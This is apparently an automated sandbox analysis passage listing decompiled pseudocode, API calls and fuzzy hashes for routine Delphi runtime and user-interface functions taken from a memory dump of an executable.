                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Clipboard$DataEnumFormats
                                                                                • String ID: hw@
                                                                                • API String ID: 1256399260-2938629419
                                                                                • Opcode ID: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction ID: d5f3744484d43ec70b7ebc33ac460ba0c135e77aa9ea613b6bd6e2d18685f22f
                                                                                • Opcode Fuzzy Hash: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction Fuzzy Hash: 5011E371B042106FDB00EFB6E852A3BB7E9EFC9758790407BF504D7392D939AC0482A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E0040342C() {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				int _v16;
                                                                                				signed short _t12;
                                                                                				signed short _t14;
                                                                                				intOrPtr _t27;
                                                                                				void* _t29;
                                                                                				void* _t31;
                                                                                				intOrPtr _t32;
                                                                                
                                                                                				_t29 = _t31;
                                                                                				_t32 = _t31 + 0xfffffff4;
                                                                                				_v12 =  *0x46b00c & 0x0000ffff;
                                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                					_t12 =  *0x46b00c; // 0x1332
                                                                                					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                					 *0x46b00c = _t14;
                                                                                					return _t14;
                                                                                				} else {
                                                                                					_push(_t29);
                                                                                					_push(E0040349D);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t32;
                                                                                					_v16 = 4;
                                                                                					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                					_pop(_t27);
                                                                                					 *[fs:eax] = _t27;
                                                                                					_push(0x4034a4);
                                                                                					return RegCloseKey(_v8);
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                • RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                • API String ID: 3677997916-4173385793
                                                                                • Opcode ID: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction ID: 3309fe86c7077c7ed47a987fd5adbd923317a9070e71e01c00789b344bd26415
                                                                                • Opcode Fuzzy Hash: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction Fuzzy Hash: 3601B575510708BAEB12DF91CD02BAABBACDB04B14F2040B6F914E66D0E6B85A10C76D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004028FC(void* __eax, void* __edx) {
                                                                                				char _v271;
                                                                                				char _v532;
                                                                                				char _v534;
                                                                                				char _v535;
                                                                                				void* _t21;
                                                                                				void* _t25;
                                                                                				CHAR* _t26;
                                                                                
                                                                                				_t25 = __edx;
                                                                                				_t21 = __eax;
                                                                                				if(__eax != 0) {
                                                                                					 *_t26 = 0x40;
                                                                                					_v535 = 0x3a;
                                                                                					_v534 = 0;
                                                                                					GetCurrentDirectoryA(0x105,  &_v271);
                                                                                					SetCurrentDirectoryA(_t26);
                                                                                				}
                                                                                				GetCurrentDirectoryA(0x105,  &_v532);
                                                                                				if(_t21 != 0) {
                                                                                					SetCurrentDirectoryA( &_v271);
                                                                                				}
                                                                                				return E00404588(_t25, 0x105,  &_v532);
                                                                                			}











                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 0040292E
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402934
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 00402943
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402954
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID: :
                                                                                • API String ID: 1611563598-336475711
                                                                                • Opcode ID: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction ID: e280489c4e77a9dbbac942a73009b5f8a6c13a22013b3f11ed9b453d4861a154
                                                                                • Opcode Fuzzy Hash: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction Fuzzy Hash: 9FF096763446C05AE310E6688852BDB72DC8B55344F04442EBBC8D73C2E6B8994857A7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0045BDF8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                				signed int _v8;
                                                                                				long _v12;
                                                                                				char _v16;
                                                                                				signed int _v17;
                                                                                				struct tagRECT _v33;
                                                                                				struct tagRECT _v49;
                                                                                				struct tagRECT _v65;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t138;
                                                                                				intOrPtr _t148;
                                                                                				signed int _t163;
                                                                                				signed int _t166;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t180;
                                                                                				intOrPtr _t181;
                                                                                				intOrPtr _t182;
                                                                                				intOrPtr _t183;
                                                                                				signed int _t188;
                                                                                				intOrPtr _t201;
                                                                                				intOrPtr _t202;
                                                                                				intOrPtr _t205;
                                                                                				intOrPtr _t206;
                                                                                				intOrPtr _t232;
                                                                                				intOrPtr _t233;
                                                                                				intOrPtr _t234;
                                                                                				intOrPtr _t235;
                                                                                				intOrPtr _t236;
                                                                                				intOrPtr _t238;
                                                                                				intOrPtr* _t240;
                                                                                				signed int _t252;
                                                                                				intOrPtr _t253;
                                                                                				intOrPtr _t256;
                                                                                				signed int _t257;
                                                                                				void* _t265;
                                                                                
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t240 = _a24 + 0xfffffffc;
                                                                                				_v16 = __edx;
                                                                                				_v49.top = _a20;
                                                                                				while(1) {
                                                                                					_t138 = _v49.top;
                                                                                					if(_t138 >= _a12) {
                                                                                						break;
                                                                                					}
                                                                                					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
                                                                                					if(_t138 > _v16) {
                                                                                						_t257 = _v8;
                                                                                						_v49.left = _v12;
                                                                                						_v49.bottom = E0045F800( *_t240, _v16) + _v49.top;
                                                                                						while(1) {
                                                                                							__eflags = _v49.left - _a16;
                                                                                							if(_v49.left >= _a16) {
                                                                                								break;
                                                                                							}
                                                                                							_t148 =  *_t240;
                                                                                							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
                                                                                							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
                                                                                								_v49.right = E0045F7E0( *_t240, _t257) + _v49.left;
                                                                                								__eflags = _v49.right - _v49.left;
                                                                                								if(_v49.right <= _v49.left) {
                                                                                									L39:
                                                                                									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
                                                                                									_t257 = _t257 + 1;
                                                                                									__eflags = _t257;
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = RectVisible(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                                								if(__eflags == 0) {
                                                                                									goto L39;
                                                                                								} else {
                                                                                									_v17 = _a4;
                                                                                									_t163 = E0045B628( *_t240, __eflags);
                                                                                									__eflags = _t163;
                                                                                									if(_t163 != 0) {
                                                                                										_t236 =  *_t240;
                                                                                										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
                                                                                										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
                                                                                											_t238 =  *_t240;
                                                                                											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
                                                                                											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
                                                                                												_t24 =  &_v17;
                                                                                												 *_t24 = _v17 | 0x00000002;
                                                                                												__eflags =  *_t24;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									_t242 = _a24 - 0x80;
                                                                                									_t166 = E0045A35C(_t257, _a24 - 0x80, _v16);
                                                                                									__eflags = _t166;
                                                                                									if(_t166 != 0) {
                                                                                										_t29 =  &_v17;
                                                                                										 *_t29 = _v17 | 0x00000001;
                                                                                										__eflags =  *_t29;
                                                                                									}
                                                                                									__eflags = _v17 & 0x00000002;
                                                                                									if((_v17 & 0x00000002) == 0) {
                                                                                										L14:
                                                                                										_t167 =  *_t240;
                                                                                										__eflags =  *((char*)(_t167 + 0x28c));
                                                                                										if( *((char*)(_t167 + 0x28c)) != 0) {
                                                                                											L16:
                                                                                											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
                                                                                											E0041FCC0( *((intOrPtr*)( *_t240 + 0x208)));
                                                                                											__eflags = _v17 & 0x00000001;
                                                                                											if(__eflags == 0) {
                                                                                												L20:
                                                                                												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
                                                                                												L21:
                                                                                												E0041F9D0(_t260,  &_v49);
                                                                                												L22:
                                                                                												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
                                                                                												_t180 =  *_t240;
                                                                                												__eflags =  *((char*)(_t180 + 0x28c));
                                                                                												if( *((char*)(_t180 + 0x28c)) != 0) {
                                                                                													__eflags = _v17 & 0x00000004;
                                                                                													if((_v17 & 0x00000004) != 0) {
                                                                                														_t201 =  *_t240;
                                                                                														__eflags =  *((char*)(_t201 + 0x1a5));
                                                                                														if( *((char*)(_t201 + 0x1a5)) != 0) {
                                                                                															_t202 = _a24;
                                                                                															_t253 = _a24;
                                                                                															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
                                                                                															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																asm("movsd");
                                                                                																_t257 = _t257;
                                                                                																_t205 = _a24;
                                                                                																__eflags =  *(_t205 - 0x84) & 0x00000004;
                                                                                																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
                                                                                																	_t206 = _a24;
                                                                                																	__eflags =  *(_t206 - 0x84) & 0x00000008;
                                                                                																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
                                                                                																		_t88 =  &(_v65.bottom);
                                                                                																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
                                                                                																		__eflags =  *_t88;
                                                                                																	}
                                                                                																} else {
                                                                                																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
                                                                                																}
                                                                                																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
                                                                                																DrawEdge(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												_t181 =  *_t240;
                                                                                												__eflags =  *((char*)(_t181 + 0x28c));
                                                                                												if( *((char*)(_t181 + 0x28c)) != 0) {
                                                                                													_t182 =  *_t240;
                                                                                													__eflags =  *(_t182 + 0x1c) & 0x00000010;
                                                                                													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
                                                                                														__eflags = _v17 & 0x00000002;
                                                                                														if((_v17 & 0x00000002) != 0) {
                                                                                															_t183 =  *_t240;
                                                                                															_t252 =  *0x45c12c; // 0x2400
                                                                                															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c12c);
                                                                                															if(_t252 != ( *(_t183 + 0x248) &  *0x45c12c)) {
                                                                                																__eflags =  *( *_t240 + 0x249) & 0x00000010;
                                                                                																if(__eflags == 0) {
                                                                                																	_t188 = E004037B0( *_t240, __eflags);
                                                                                																	__eflags = _t188;
                                                                                																	if(_t188 != 0) {
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		asm("movsd");
                                                                                																		_t257 = _t257;
                                                                                																		_v33.left = _v49.right;
                                                                                																		_v33.right = _v49.left;
                                                                                																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
                                                                                																	} else {
                                                                                																		DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												goto L39;
                                                                                											}
                                                                                											__eflags = _v17 & 0x00000002;
                                                                                											if(__eflags == 0) {
                                                                                												L19:
                                                                                												E0041F338( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
                                                                                												E0041EB4C( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
                                                                                												goto L21;
                                                                                											}
                                                                                											_t256 =  *0x45c128; // 0x0
                                                                                											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c124);
                                                                                											if(__eflags == 0) {
                                                                                												goto L20;
                                                                                											}
                                                                                											goto L19;
                                                                                										}
                                                                                										_t232 =  *_t240;
                                                                                										__eflags =  *(_t232 + 0x1c) & 0x00000010;
                                                                                										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
                                                                                											goto L22;
                                                                                										}
                                                                                										goto L16;
                                                                                									}
                                                                                									_t233 =  *_t240;
                                                                                									__eflags =  *(_t233 + 0x249) & 0x00000004;
                                                                                									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
                                                                                										goto L14;
                                                                                									}
                                                                                									_t234 =  *_t240;
                                                                                									__eflags =  *((char*)(_t234 + 0x28d));
                                                                                									if( *((char*)(_t234 + 0x28d)) == 0) {
                                                                                										goto L14;
                                                                                									}
                                                                                									_t235 =  *_t240;
                                                                                									__eflags =  *(_t235 + 0x1c) & 0x00000010;
                                                                                									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
                                                                                										goto L39;
                                                                                									}
                                                                                									goto L14;
                                                                                								}
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
                                                                                						_t130 =  &_v16;
                                                                                						 *_t130 = _v16 + 1;
                                                                                						__eflags =  *_t130;
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t138;
                                                                                			}






































                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction ID: 837a3775693fb1747dfe6eea28fc7c014706e51f64b2177a40ed002ee77a759f
                                                                                • Opcode Fuzzy Hash: cece8a76ed6c42ea098dfc4e10f05c1ef134cf81c6061f06068430d5f36978dc
                                                                                • Instruction Fuzzy Hash: 2AB11B75A006189FDB10DF58C485BEEB7F5EF09305F1440A6ED44AB3A2C778AC4ACB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0044E634(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				signed char _t92;
                                                                                				int _t98;
                                                                                				int _t100;
                                                                                				intOrPtr _t117;
                                                                                				int _t122;
                                                                                				intOrPtr _t155;
                                                                                				void* _t164;
                                                                                				signed char _t180;
                                                                                				intOrPtr _t182;
                                                                                				intOrPtr _t194;
                                                                                				int _t199;
                                                                                				intOrPtr _t203;
                                                                                				void* _t204;
                                                                                
                                                                                				_t204 = __eflags;
                                                                                				_t202 = _t203;
                                                                                				_v8 = __eax;
                                                                                				E00438704(_v8);
                                                                                				_push(_t203);
                                                                                				_push(0x44e88a);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t203;
                                                                                				 *(_v8 + 0x268) = 0;
                                                                                				 *(_v8 + 0x26c) = 0;
                                                                                				 *(_v8 + 0x270) = 0;
                                                                                				_t164 = 0;
                                                                                				_t92 =  *0x487709; // 0x0
                                                                                				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                                				E00437E74(_v8, 0, __edx, _t204);
                                                                                				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                                					L12:
                                                                                					_t98 =  *(_v8 + 0x268);
                                                                                					_t213 = _t98;
                                                                                					if(_t98 > 0) {
                                                                                						E004350BC(_v8, _t98, _t213);
                                                                                					}
                                                                                					_t100 =  *(_v8 + 0x26c);
                                                                                					_t214 = _t100;
                                                                                					if(_t100 > 0) {
                                                                                						E00435100(_v8, _t100, _t214);
                                                                                					}
                                                                                					_t180 =  *0x44e898; // 0x0
                                                                                					 *(_v8 + 0x98) = _t180;
                                                                                					_t215 = _t164;
                                                                                					if(_t164 == 0) {
                                                                                						E0044DB9C(_v8, 1, 1);
                                                                                						E0043B818(_v8, 1, 1, _t215);
                                                                                					}
                                                                                					E00436848(_v8, 0, 0xb03d, 0);
                                                                                					_pop(_t182);
                                                                                					 *[fs:eax] = _t182;
                                                                                					_push(0x44e891);
                                                                                					return E0043870C(_v8);
                                                                                				} else {
                                                                                					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                                						_t194 =  *0x487c00; // 0x2290f1c
                                                                                						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                                                							_t155 =  *0x487c00; // 0x2290f1c
                                                                                							E0041ED34( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041ED2C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                                                						}
                                                                                					}
                                                                                					_t117 =  *0x487c00; // 0x2290f1c
                                                                                					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                                                					_t199 = E0044E9BC(_v8);
                                                                                					_t122 =  *(_v8 + 0x270);
                                                                                					_t209 = _t199 - _t122;
                                                                                					if(_t199 != _t122) {
                                                                                						_t164 = 1;
                                                                                						E0044DB9C(_v8, _t122, _t199);
                                                                                						E0043B818(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                                						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                                							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                                							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                                							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                                							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                                						}
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6F3
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E76F
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E79E
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7CD
                                                                                • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction ID: 4bc58ff00013c07b577bdc672f5bb2155b15ba06c25ac9d37719f0d5c6b72ce6
                                                                                • Opcode Fuzzy Hash: 179e502b649ba4b6491df2e8353e2539bc661f28efba15cfb078de0c6466ef6c
                                                                                • Instruction Fuzzy Hash: 8371C474A04104EFDB04EBA9C589AADB7F5BF49304F2541F9E808EB362C739AE41DB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E004459FC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* _v16;
                                                                                				struct tagRECT _v32;
                                                                                				void* _t53;
                                                                                				int _t63;
                                                                                				CHAR* _t65;
                                                                                				void* _t76;
                                                                                				void* _t78;
                                                                                				int _t89;
                                                                                				CHAR* _t91;
                                                                                				int _t117;
                                                                                				intOrPtr _t127;
                                                                                				void* _t139;
                                                                                				void* _t144;
                                                                                				char _t153;
                                                                                
                                                                                				_t120 = __ecx;
                                                                                				_t143 = _t144;
                                                                                				_v16 = 0;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t139 = __eax;
                                                                                				_t117 = _a4;
                                                                                				_push(_t144);
                                                                                				_push(0x445be0);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                                				_t53 = E00447860(__eax);
                                                                                				_t135 = _t53;
                                                                                				if(_t53 != 0 && E00448E9C(_t135) != 0) {
                                                                                					if((_t117 & 0x00000000) != 0) {
                                                                                						__eflags = (_t117 & 0x00000002) - 2;
                                                                                						if((_t117 & 0x00000002) == 2) {
                                                                                							_t117 = _t117 & 0xfffffffd;
                                                                                							__eflags = _t117;
                                                                                						}
                                                                                					} else {
                                                                                						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                                					}
                                                                                					_t117 = _t117 | 0x00020000;
                                                                                				}
                                                                                				E004043B8( &_v16, _v12);
                                                                                				if((_t117 & 0x00000004) == 0) {
                                                                                					L12:
                                                                                					E0040471C(_v16, 0x445c04);
                                                                                					if(_t153 != 0) {
                                                                                						E0041F454( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                                						__eflags =  *((char*)(_t139 + 0x3a));
                                                                                						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                                							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                							__eflags = E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08;
                                                                                							E0041EE18( *((intOrPtr*)(_v8 + 0xc)), E0041EE0C( *((intOrPtr*)(_v8 + 0xc))) |  *0x445c08, _t136, _t139, _t143);
                                                                                						}
                                                                                						__eflags =  *((char*)(_t139 + 0x39));
                                                                                						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                                							L24:
                                                                                							_t63 = E004045D8(_v16);
                                                                                							_t65 = E004047D0(_v16);
                                                                                							DrawTextA(E0041FDC4(_v8), _t65, _t63, _a12, _t117);
                                                                                							L25:
                                                                                							_pop(_t127);
                                                                                							 *[fs:eax] = _t127;
                                                                                							_push(0x445be7);
                                                                                							return E00404320( &_v16);
                                                                                						} else {
                                                                                							__eflags = _a8;
                                                                                							if(_a8 == 0) {
                                                                                								OffsetRect(_a12, 1, 1);
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                                								_t89 = E004045D8(_v16);
                                                                                								_t91 = E004047D0(_v16);
                                                                                								DrawTextA(E0041FDC4(_v8), _t91, _t89, _a12, _t117);
                                                                                								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                                							}
                                                                                							__eflags = _a8;
                                                                                							if(_a8 == 0) {
                                                                                								L23:
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
                                                                                							} else {
                                                                                								_t76 = E0041E68C(0x8000000d);
                                                                                								_t78 = E0041E68C(0x80000010);
                                                                                								__eflags = _t76 - _t78;
                                                                                								if(_t76 != _t78) {
                                                                                									goto L23;
                                                                                								}
                                                                                								E0041EB4C( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                                							}
                                                                                							goto L24;
                                                                                						}
                                                                                					}
                                                                                					if((_t117 & 0x00000004) == 0) {
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_v32.top = _v32.top + 4;
                                                                                						DrawEdge(E0041FDC4(_v8),  &_v32, 6, 2);
                                                                                					}
                                                                                					goto L25;
                                                                                				} else {
                                                                                					if(_v16 == 0) {
                                                                                						L11:
                                                                                						E004045E0( &_v16, 0x445bf8);
                                                                                						goto L12;
                                                                                					}
                                                                                					if( *_v16 != 0x26) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t153 =  *((char*)(_v16 + 1));
                                                                                					if(_t153 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L11;
                                                                                				}
                                                                                			}




















                                                                                APIs
                                                                                • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445ACB
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00445B1C
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B51
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B5E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445BC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Draw$OffsetRectText$Edge
                                                                                • String ID:
                                                                                • API String ID: 3610532707-0
                                                                                • Opcode ID: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction ID: 68969ed9cb05b664d4419c1763d0a6a8e74d1c20bfe0b3deb612a047e544336f
